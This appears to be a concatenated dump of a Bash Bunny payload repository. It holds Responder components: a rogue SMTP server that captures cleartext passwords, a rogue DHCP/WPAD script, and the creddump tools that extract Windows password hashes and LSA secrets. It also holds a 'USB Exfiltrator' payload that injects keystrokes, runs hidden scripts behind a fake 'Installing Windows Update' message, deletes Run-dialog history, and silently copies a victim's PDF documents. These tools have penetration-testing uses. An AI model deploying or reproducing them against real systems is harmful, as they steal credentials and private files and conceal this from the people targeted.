/payloads/library/tools_installer/tools_to_install/responder/servers/SMTP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from base64 import b64decode 19 | from SocketServer import BaseRequestHandler 20 | from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2 21 | 22 | class ESMTP(BaseRequestHandler): 23 | 24 | def handle(self): 25 | try: 26 | self.request.send(str(SMTPGreeting())) 27 | data = self.request.recv(1024) 28 | 29 | if data[0:4] == "EHLO": 30 | self.request.send(str(SMTPAUTH())) 31 | data = self.request.recv(1024) 32 | 33 | if data[0:4] == "AUTH": 34 | self.request.send(str(SMTPAUTH1())) 35 | data = self.request.recv(1024) 36 | 37 | if data: 38 | try: 39 | User = filter(None, b64decode(data).split('\x00')) 40 | Username = User[0] 41 | Password = User[1] 42 | except: 43 | Username = b64decode(data) 44 | 45 | self.request.send(str(SMTPAUTH2())) 46 | data = self.request.recv(1024) 47 | 48 | if data: 49 | try: Password = b64decode(data) 50 | except: Password = data 51 | 52 | SaveToDb({ 53 | 'module': 'SMTP', 54 | 'type': 'Cleartext', 55 | 'client': self.client_address[0], 56 | 'user': Username, 57 | 'cleartext': Password, 58 | 'fullhash': Username+":"+Password, 59 | }) 60 | 61 | except Exception: 62 | pass 63 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/servers/__init__.py -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/DHCP_Auto.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # This file is part of Responder. laurent.gaffie@gmail.com 3 | # 4 | # 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | 18 | # This script will try to auto-detect network parameters 19 | # to run the rogue DHCP server, to inject only your IP 20 | # address as the primary DNS server and WPAD server and 21 | # leave everything else normal. 22 | 23 | if [ -z $1 ]; then 24 | echo "usage: $0 " 25 | exit 26 | fi 27 | 28 | if [ $EUID -ne 0 ]; then 29 | echo "Must be run as root." 30 | exit 31 | fi 32 | 33 | if [ ! -d "/sys/class/net/$1" ]; then 34 | echo "Interface does not exist." 35 | exit 36 | fi 37 | 38 | INTF=$1 39 | PATH="$PATH:/sbin" 40 | IPADDR=`ifconfig $INTF | sed -n 's/inet addr/inet/; s/inet[ :]//p' | awk '{print $1}'` 41 | NETMASK=`ifconfig $INTF | sed -n 's/.*[Mm]ask[: ]//p' | awk '{print $1}'` 42 | DOMAIN=`grep -E "^domain |^search " /etc/resolv.conf | sort | head -1 | awk '{print $2}'` 43 | DNS1=$IPADDR 44 | DNS2=`grep ^nameserver /etc/resolv.conf | head -1 | awk '{print $2}'` 45 | ROUTER=`route -n | grep ^0.0.0.0 | awk '{print $2}'` 46 | WPADSTR="http://$IPADDR/wpad.dat" 47 | if [ -z "$DOMAIN" ]; then 48 | DOMAIN=" " 49 | fi 50 | 51 | echo "Running with parameters:" 52 | echo "INTERFACE: $INTF" 53 | echo "IP ADDR: $IPADDR" 54 | echo "NETMAST: $NETMASK" 55 | echo "ROUTER IP: $ROUTER" 56 | echo "DNS1 IP: $DNS1" 57 | echo "DNS2 IP: $DNS2" 58 | echo "WPAD: $WPADSTR" 59 | echo "" 60 | 61 | 62 | echo python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\" 63 | python DHCP.py -I $INTF -r $ROUTER -p $DNS1 -s $DNS2 -n $NETMASK -d \"$DOMAIN\" -w \"$WPADSTR\" 64 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/FindSMB2UPTime.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import sys 18 | import os 19 | import datetime 20 | import struct 21 | import socket 22 | 23 | sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))) 24 | from packets import SMB2Header, SMB2Nego, SMB2NegoData 25 | 26 | def GetBootTime(data): 27 | Filetime = int(struct.unpack('i", len(Packet)) + Packet 52 | s.send(Buffer) 53 | 54 | try: 55 | data = s.recv(1024) 56 | if data[4:5] == "\xff": 57 | print "This host doesn't support SMBv2" 58 | if data[4:5] == "\xfe": 59 | IsDCVuln(GetBootTime(data[116:124])) 60 | except Exception: 61 | s.close() 62 | raise 63 | 64 | if __name__ == "__main__": 65 | if len(sys.argv)<=1: 66 | sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address') 67 | host = sys.argv[1],445 68 | run(host) 69 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/FindSQLSrv.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from socket import * 18 | 19 | print 'MSSQL Server Finder 0.1' 20 | 21 | s = socket(AF_INET,SOCK_DGRAM) 22 | s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1) 23 | s.settimeout(2) 24 | s.sendto('\x02',('255.255.255.255',1434)) 25 | 26 | try: 27 | while 1: 28 | data, address = s.recvfrom(8092) 29 | if not data: 30 | break 31 | else: 32 | print "===============================================================" 33 | print "Host details:",address[0] 34 | print data[2:] 35 | print "===============================================================" 36 | print "" 37 | except: 38 | pass 39 | 40 | 41 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/__init__.py -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/CHANGELOG: -------------------------------------------------------------------------------- 1 | Version: 0.3 Date: 8/1/2012 2 | 3 | * Fixed LM and NTLM Hash Corruption issue. Thanks to Jonathan Claudius. 4 | Closes Issue 3. 5 | 6 | Version: 0.2 Date: 2/24/2011 7 | 8 | * Fixed issue with wrong format specifier being used (L instead of I), which 9 | caused creddump to fail on 64-bit systems. 10 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/README: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/README -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/cachedump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This file is part of creddump. 4 | # 5 | # creddump is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # creddump is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with creddump. If not, see . 17 | 18 | """ 19 | @author: Brendan Dolan-Gavitt 20 | @license: GNU General Public License 2.0 or later 21 | @contact: bdolangavitt@wesleyan.edu 22 | """ 23 | 24 | 25 | import sys 26 | from framework.win32.domcachedump import dump_file_hashes 27 | 28 | if len(sys.argv) < 3: 29 | print "usage: %s bootkey " % sys.argv[0] 30 | sys.exit(1) 31 | 32 | dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2]) 33 | 34 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/__init__.py -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/types.py: -------------------------------------------------------------------------------- 1 | # This file is part of creddump. 2 | # 3 | # creddump is free software: you can redistribute it and/or modify 4 | # it under the terms of the GNU General Public License as published by 5 | # the Free Software Foundation, either version 3 of the License, or 6 | # (at your option) any later version. 7 | # 8 | # creddump is distributed in the hope that it will be useful, 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | # GNU General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with creddump. If not, see . 15 | 16 | """ 17 | @author: Brendan Dolan-Gavitt 18 | @license: GNU General Public License 2.0 or later 19 | @contact: bdolangavitt@wesleyan.edu 20 | """ 21 | 22 | regtypes = { 23 | '_CM_KEY_VALUE' : [ 0x18, { 24 | 'Signature' : [ 0x0, ['unsigned short']], 25 | 'NameLength' : [ 0x2, ['unsigned short']], 26 | 'DataLength' : [ 0x4, ['unsigned long']], 27 | 'Data' : [ 0x8, ['unsigned long']], 28 | 'Type' : [ 0xc, ['unsigned long']], 29 | 'Flags' : [ 0x10, ['unsigned short']], 30 | 'Spare' : [ 0x12, ['unsigned short']], 31 | 'Name' : [ 0x14, ['array', 1, ['unsigned short']]], 32 | } ], 33 | '_CM_KEY_NODE' : [ 0x50, { 34 | 'Signature' : [ 0x0, ['unsigned short']], 35 | 'Flags' : [ 0x2, ['unsigned short']], 36 | 'LastWriteTime' : [ 0x4, ['_LARGE_INTEGER']], 37 | 'Spare' : [ 0xc, ['unsigned long']], 38 | 'Parent' : [ 0x10, ['unsigned long']], 39 | 'SubKeyCounts' : [ 0x14, ['array', 2, ['unsigned long']]], 40 | 'SubKeyLists' : [ 0x1c, ['array', 2, ['unsigned long']]], 41 | 'ValueList' : [ 0x24, ['_CHILD_LIST']], 42 | 'ChildHiveReference' : [ 0x1c, ['_CM_KEY_REFERENCE']], 43 | 'Security' : [ 0x2c, ['unsigned long']], 44 | 'Class' : [ 0x30, ['unsigned long']], 45 | 'MaxNameLen' : [ 0x34, ['unsigned long']], 46 | 'MaxClassLen' : [ 0x38, ['unsigned long']], 47 | 'MaxValueNameLen' : [ 0x3c, ['unsigned long']], 48 | 'MaxValueDataLen' : [ 0x40, ['unsigned long']], 49 | 'WorkVar' : [ 0x44, ['unsigned long']], 50 | 'NameLength' : [ 0x48, ['unsigned short']], 51 | 'ClassLength' : [ 0x4a, ['unsigned short']], 52 | 'Name' : [ 0x4c, ['array', 1, ['unsigned short']]], 53 | } ], 54 | '_CM_KEY_INDEX' : [ 0x8, { 55 | 'Signature' : [ 0x0, ['unsigned short']], 56 | 'Count' : [ 0x2, ['unsigned short']], 57 | 'List' : [ 0x4, ['array', 1, ['unsigned long']]], 58 | } ], 59 | '_CHILD_LIST' : [ 0x8, { 60 | 'Count' : [ 0x0, ['unsigned long']], 61 | 'List' : [ 0x4, ['unsigned long']], 62 | } ], 63 | } 64 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/win32/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/win32/__init__.py -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/framework/win32/rawreg.py: -------------------------------------------------------------------------------- 1 | # This file is part of creddump. 2 | # 3 | # creddump is free software: you can redistribute it and/or modify 4 | # it under the terms of the GNU General Public License as published by 5 | # the Free Software Foundation, either version 3 of the License, or 6 | # (at your option) any later version. 7 | # 8 | # creddump is distributed in the hope that it will be useful, 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | # GNU General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with creddump. If not, see . 15 | 16 | """ 17 | @author: Brendan Dolan-Gavitt 18 | @license: GNU General Public License 2.0 or later 19 | @contact: bdolangavitt@wesleyan.edu 20 | """ 21 | 22 | from framework.newobj import Obj,Pointer 23 | from struct import unpack 24 | 25 | ROOT_INDEX = 0x20 26 | LH_SIG = unpack(". 17 | 18 | """ 19 | @author: Brendan Dolan-Gavitt 20 | @license: GNU General Public License 2.0 or later 21 | @contact: bdolangavitt@wesleyan.edu 22 | """ 23 | 24 | import sys 25 | from framework.win32.lsasecrets import get_file_secrets 26 | 27 | # Hex dump code from 28 | # http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812 29 | 30 | FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) 31 | 32 | def dump(src, length=8): 33 | N=0; result='' 34 | while src: 35 | s,src = src[:length],src[length:] 36 | hexa = ' '.join(["%02X"%ord(x) for x in s]) 37 | s = s.translate(FILTER) 38 | result += "%04X %-*s %s\n" % (N, length*3, hexa, s) 39 | N+=length 40 | return result 41 | 42 | if len(sys.argv) < 3: 43 | print "usage: %s Bootkey " % sys.argv[0] 44 | sys.exit(1) 45 | 46 | secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2]) 47 | if not secrets: 48 | print "Unable to read LSA secrets. Perhaps you provided invalid hive files?" 49 | sys.exit(1) 50 | 51 | for k in secrets: 52 | print k 53 | print dump(secrets[k], length=16) 54 | 55 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/pwdump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This file is part of creddump. 4 | # 5 | # creddump is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # creddump is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with creddump. If not, see . 17 | 18 | """ 19 | @author: Brendan Dolan-Gavitt 20 | @license: GNU General Public License 2.0 or later 21 | @contact: bdolangavitt@wesleyan.edu 22 | """ 23 | 24 | import sys 25 | from framework.win32.hashdump import dump_file_hashes 26 | 27 | if len(sys.argv) < 3: 28 | print "usage: %s bootkey SAM_File" % sys.argv[0] 29 | sys.exit(1) 30 | 31 | dump_file_hashes(sys.argv[1].decode("hex"), sys.argv[2]) 32 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/relay-dumps/.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/relay-dumps/.gitignore -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/SMBFinger/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/demmsec/bashbunny-payloads/487eda17b7ebf9649fc6e7d393774850a0aef6a3/payloads/library/tools_installer/tools_to_install/responder/tools/SMBFinger/__init__.py -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/d.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 3 | cscript %~dp0\i.vbs %~dp0\e.cmd 4 | @exit -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/e.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | @echo Installing Windows Update 3 | 4 | REM Delete registry keys storing Run dialog history 5 | REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f 6 | 7 | REM Creates directory compromised of computer name, date and time 8 | REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious 9 | set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% 10 | mkdir %dst% >>nul 11 | 12 | if Exist %USERPROFILE%\Documents ( 13 | REM /C Continues copying even if errors occur. 14 | REM /Q Does not display file names while copying. 15 | REM /G Allows the copying of encrypted files to destination that does not support encryption. 16 | REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. 17 | REM /E Copies directories and subdirectories, including empty ones. 18 | 19 | REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul 20 | 21 | REM Same as above but does not create empty directories 22 | xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul 23 | ) 24 | 25 | REM Blink CAPSLOCK key 26 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 27 | 28 | @cls 29 | @exit -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/i.vbs: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False 2 | -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: USB Exfiltration 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # Target: Windows XP SP3+ 7 | # Props: Diggster, IMcPwn 8 | # 9 | # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, 10 | # which in turn executes e.cmd invisibly using i.vbs 11 | # which in turn copies documents to the loot folder on the Bash Bunny. 12 | # 13 | 14 | # Source bunny_helpers.sh to get environment variable SWITCH_POSITION 15 | source bunny_helpers.sh 16 | 17 | LED R 18 | ATTACKMODE HID STORAGE 19 | QUACK GUI r 20 | QUACK DELAY 100 21 | QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" 22 | QUACK ENTER 23 | LED G 24 | -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/readme.md: -------------------------------------------------------------------------------- 1 | # Exfiltrator for Bash Bunnys 2 | 3 | * Author: Hak5Darren 4 | * Version: Version 1.1 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Exfiltrates files from the users Documents folder 10 | Saves to the loot folder on the Bash Bunny USB Mass Storage partition named by the victim hostname, date and timestamp. 11 | 12 | ## Configuration 13 | 14 | By default the staged payload exfiltrates PDF files. Change the xcopy commands from e.cmd to your liking. 15 | 16 | ## STATUS 17 | 18 | | LED | Status | 19 | | ------------------ | -------------------------------------------- | 20 | | White (blinking) | Setup Failed. Target didn't obtain IP | 21 | | Red | Attack Setup | 22 | | Green | Attack Complete | 23 | 24 | ## Discussion 25 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40225-payload-usb_exfiltrator/ "Hak5 Forum Thread") 26 | -------------------------------------------------------------------------------- /payloads/switch1/payload.txt: -------------------------------------------------------------------------------- 1 | LED R B 2 | ATTACKMODE ECM_ETHERNET STORAGE 3 | -------------------------------------------------------------------------------- /payloads/switch2/payload.txt: -------------------------------------------------------------------------------- 1 | LED R B 2 | ATTACKMODE RNDIS_ETHERNET 3 | --------------------------------------------------------------------------------